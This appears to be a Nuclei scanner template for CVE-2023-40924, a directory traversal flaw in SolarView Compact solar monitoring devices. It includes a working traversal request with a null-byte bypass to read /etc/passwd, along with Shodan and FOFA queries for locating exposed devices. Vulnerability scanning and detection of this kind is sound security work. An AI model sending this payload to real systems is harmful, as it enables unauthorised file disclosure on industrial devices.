SolarView Compact < 6.00 - Directory Traversal

id: CVE-2023-40924

info:
  name: SolarView Compact < 6.00 - Directory Traversal
  author: DhiyaneshDk
  severity: high
  description: |
    SolarView Compact before version 6.00 is vulnerable to directory traversal via the file parameter in downloader.php. An unauthenticated attacker can read arbitrary files from the system by using path traversal sequences with a null byte bypass to access sensitive files such as /etc/passwd.
  impact: |
    An attacker can read sensitive system files including /etc/passwd which may contain password hashes on embedded devices, potentially leading to full system compromise.
  remediation: |
    Upgrade SolarView Compact to version 6.00 or later.
  reference:
    - https://github.com/Yobing1/CVE-2023-40924/blob/main/README.md
    - https://nvd.nist.gov/vuln/detail/CVE-2023-40924
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-40924
    epss-score: 0.66586
    epss-percentile: 0.98559
    cwe-id: CWE-22
    cpe: cpe:2.3:o:contec:solarview_compact_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: contec
    product: solarview_compact_firmware
    shodan-query:
      - http.html:"SolarView Compact"
      - http.favicon.hash:"-244067125"
      - http.html:"solarview compact"
    fofa-query:
      - body="solarview compact"
      - icon_hash="-244067125"
  tags: cve,cve2023,lfi,solarview,contec,traversal,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/downloader.php?file=../../../../../../../../../../etc/passwd%00.jpg"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a00463044022035c803441ddda4e987536635b817a0bff66797c1cfd0bf21f80ffb0df2519758022044820e5319f1a5d5d7580d837c768bdbce4952e50e5285f5c559f284d647c72d:922c64590222798bb761d5b6d8e72950